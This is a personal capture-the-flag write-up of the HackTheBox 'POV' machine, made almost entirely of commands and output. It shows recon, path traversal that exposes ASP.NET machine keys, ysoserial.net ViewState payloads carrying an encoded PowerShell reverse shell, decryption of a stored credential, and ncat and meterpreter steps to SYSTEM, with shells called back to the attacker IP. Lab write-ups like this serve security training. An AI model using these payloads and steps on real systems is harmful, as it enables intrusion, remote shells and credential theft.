Here is my notes on POV box from Hackthebox
POV: 10.129.230.183
sudo autorecon 10.129.230.183 --vhost-enum.hostname pov.htb --vhost-enum.wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --vhost-enum.threads 5 --global.domain pov.htb
Nmap scan report for pov.htb (10.129.230.183)
Host is up, received user-set (0.043s latency).
Scanned at 2025-06-04 19:33:17 GMT for 265s
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: E9B5E66DEBD9405ED864CAC17E2A888E
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: pov.htb
200 GET 6l 20w 1480c http://10.129.230.183/img/client-2.png
200 GET 162l 286w 2399c http://10.129.230.183/css/custom.css
200 GET 3l 15w 1063c http://10.129.230.183/img/client-4.png
200 GET 2l 284w 14244c http://10.129.230.183/js/aos.js
200 GET 14l 43w 2390c http://10.129.230.183/img/client-1.png
200 GET 8l 34w 2034c http://10.129.230.183/img/client-3.png
200 GET 4l 10w 382c http://10.129.230.183/img/favicon.png
200 GET 22l 132w 13356c http://10.129.230.183/img/smart-protect-1.jpg
200 GET 19l 133w 11607c http://10.129.230.183/img/smart-protect-2.jpg
200 GET 23l 207w 11858c http://10.129.230.183/img/smart-protect-3.jpg
200 GET 5l 26w 1732c http://10.129.230.183/img/client-5.png
200 GET 4l 66w 31000c http://10.129.230.183/font-awesome-4.7.0/css/font-awesome.min.css
200 GET 3l 20w 1898c http://10.129.230.183/img/client-6.png
200 GET 2l 220w 25983c http://10.129.230.183/css/aos.css
200 GET 13l 55w 5918c http://10.129.230.183/img/logo.png
200 GET 325l 1886w 151416c http://10.129.230.183/img/feature-2.png
200 GET 339l 1666w 139445c http://10.129.230.183/img/feature-1.png
200 GET 6l 1643w 150996c http://10.129.230.183/css/bootstrap.min.css
200 GET 234l 834w 12330c http://10.129.230.183/
200 GET 234l 834w 12330c http://10.129.230.183/Index.html
403 GET 29l 92w 1233c http://10.129.230.183/css/
403 GET 29l 92w 1233c http://10.129.230.183/img/
200 GET 234l 834w 12330c http://10.129.230.183/index.html
403 GET 29l 92w 1233c http://10.129.230.183/js/
403 GET 29l 92w 1233c http://10.129.230.183/CSS/
403 GET 29l 92w 1233c http://10.129.230.183/JS/
403 GET 29l 92w 1233c http://10.129.230.183/Css/
403 GET 29l 92w 1233c http://10.129.230.183/Js/
403 GET 29l 92w 1233c http://10.129.230.183/IMG/
403 GET 29l 92w 1233c http://10.129.230.183/Img/
200 GET 234l 834w 12330c http://10.129.230.183/INDEX.html
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://pov.htb/ -H "Host: FUZZ.pov.htb" --fs 12330
dev [Status: 302, Size: 152, Words: 9, Lines: 2, Duration: 90ms]
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://dev.pov.htb/
sudo gobuster dir -u http://dev.pov.htb/portfolio -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -x asp,aspx
About section:
Download CV in Burp Request.
__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=x0Z1oV5BBNGOk151Q7JX0AR9I94ay7GjgQm9%2F%2BmL6Dq9%2FoPBbFEWRzLr5dcqXZBLex%2B1BF79HonJFVjS0Yl9e60EN9A%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=yXYW9Bh2SMXV6I3OspWOjrQ%2FAK4uV63keZuigp2xqFKOkA0WVbrNUPZHIo3RPPg7%2FdvTLmroAQB1PFv%2F44zEs1bos5wzxu1KoUhyX2okOoaSW8g3jpGaGGgxpz6vEuATWlzL4A%3D%3D&file=cv.pdf
file=cv.pdf is interesting.
file=../../../cv.pdf - WORKS !
could it be vulnerable to LFI ?
file=/../../../web.config #WORKS !
file=web.config #WORKS !
web.config:
<configuration>
<system.web>
<customErrors mode="On" defaultRedirect="default.aspx" />
<httpRuntime targetFramework="4.5" />
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
</system.web>
<system.webServer>
<httpErrors>
<remove statusCode="403" subStatusCode="-1" />
<error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
</httpErrors>
<httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
</system.webServer>
</configuration>
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
Viewstate Framework version 4.5
https://github.com/pwntester/ysoserial.net/releases
ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "ping 10.10.14.142" --path="/portfolio/contact.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe -c wget http://10.10.14.142/" --path="/portfolio/contact.aspx" --apppath="/portfolio" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
ysoserial.exe -p ViewState -g TextFormattingRunProperties --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" --path="/portfolio/contact.aspx" -c "powershell.exe Invoke-WebRequest -Uri http://10.10.14.142/$env:UserName"
ysoserial.exe -p ViewState -g WindowsIdentity --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" --path="/portfolio" -c "ping 10.10.14.142"
WORKS !:
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA0ADIAIgAsADEAMgAzADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA0ADIAIgAsADEAMgAzADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
https://github.com/julianssb/HackTheBox/blob/main/pov%20-%20VIEWSTATE%20-%20Powershell%20creds%20-%20Migrate%20process
┌──(root㉿kali)-[/home/kali/BOXES/POV]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.142] from (UNKNOWN) [10.129.230.183] 49671
whoami
pov\sfitz
PS C:\windows\system32\inetsrv> whoami
pov\sfitz
PS C:\windows\system32\inetsrv> hostname
pov
USER-SHELL !
PRIV ESC:
sfitz > alaading:
PS C:\Users\sfitz> cd Documents
PS C:\Users\sfitz\Documents> dir
Directory: C:\Users\sfitz\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/25/2023 2:26 PM 1838 connection.xml
PS C:\Users\sfitz\Documents> type connection.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">alaading</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>
</Props>
</Obj>
</Objs>
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6" | convertto-securestring
$user = "pov\alaading"
$cred = New-Object System.management.Automation.PSCredential($user, $pass)
$cred.GetNetworkCredential() | fl
PS C:\Users\sfitz\Documents> $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6" | convertto-securestring
PS C:\Users\sfitz\Documents> PS C:\Users\sfitz\Documents> $user = "pov\alaading"
PS C:\Users\sfitz\Documents> PS C:\Users\sfitz\Documents> $cred = New-Object System.management.Automation.PSCredential($user, $pass)
PS C:\Users\sfitz\Documents> PS C:\Users\sfitz\Documents> $cred.GetNetworkCredential() | fl
UserName : alaading
Password : f8gQ8fynP44ek1m3
SecurePassword : System.Security.SecureString
Domain : pov
alaading:f8gQ8fynP44ek1m3
import-module .\Invoke-RunasCs.ps1
Invoke-RunasCs -Username alaading -Password 'f8gQ8fynP44ek1m3' -Command cmd.exe -Remote 10.10.14.142:4444
┌──(root㉿kali)-[/home/kali/BOXES/POV]
└─# sudo rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.142] from (UNKNOWN) [10.129.230.183] 49673
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
pov\alaading
C:\Windows\system32>hostname
hostname
pov
C:\Users\alaading\Desktop>whoami
whoami
pov\alaading
C:\Users\alaading\Desktop>hostname
hostname
pov
C:\Users\alaading\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0899-6CAF
Directory of C:\Users\alaading\Desktop
01/11/2024 07:43 AM <DIR> .
01/11/2024 07:43 AM <DIR> ..
06/04/2025 11:36 AM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 7,094,108,160 bytes free
C:\Users\alaading\Desktop>type user.txt
type user.txt
[REDIRECTED]
USER.TXT: [REDIRECTED]
alaading -> SYSTEM:
C:\Users\alaading\Desktop>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeDebugPrivilege Debug programs Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\Users\alaading\Desktop>powershell.exe -ep bypass
powershell.exe -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\alaading\Desktop> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeDebugPrivilege Debug programs Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Users\alaading> Import-Module .\psgetsys.ps1
Import-Module .\psgetsys.ps1
PS C:\Users\alaading> Get-Process winlogon
Get-Process winlogon
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
255 12 2648 16448 0.19 552 1 winlogon
[MyProcess]::CreateProcessFromParent("552","c:\windows\system32\cmd.exe", "/c C:\Users\Public\ncat.exe 10.10.14.142 5555 -e cmd.exe")
.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent("552","c:\windows\system32\cmd.exe", "/c C:\Users\Public\ncat.exe 10.10.14.142 5555 -e cmd.exe")
If that don't work then use metasploit way as long you know the PID of winlogon:
meterpreter > migrate 552
[*] Migrating from 2328 to 552...
[*] Migration completed successfully.
meterpreter > shell
Process 3064 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>hostname
hostname
pov
SYSTEM-SHELL !
https://github.com/julianssb/HackTheBox/blob/main/pov%20-%20VIEWSTATE%20-%20Powershell%20creds%20-%20Migrate%20process
C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
hostname
pov
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0899-6CAF
Directory of C:\Users\Administrator\Desktop
01/15/2024 05:11 AM <DIR> .
01/15/2024 05:11 AM <DIR> ..
06/04/2025 11:36 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 7,089,254,400 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
[REDIRECTED]
ROOT.TXT: [REDIRECTED]
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=6/4%OT=80%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=6840A086%P=x86_64-pc-linux-gnu)
SEQ(SP=106%GCD=1%ISR=107%TS=U)
OPS(O1=M552NW8NNS%O2=M552NW8NNS%O3=M552NW8%O4=M552NW8NNS%O5=M552NW8NNS%O6=M552NNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M552NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows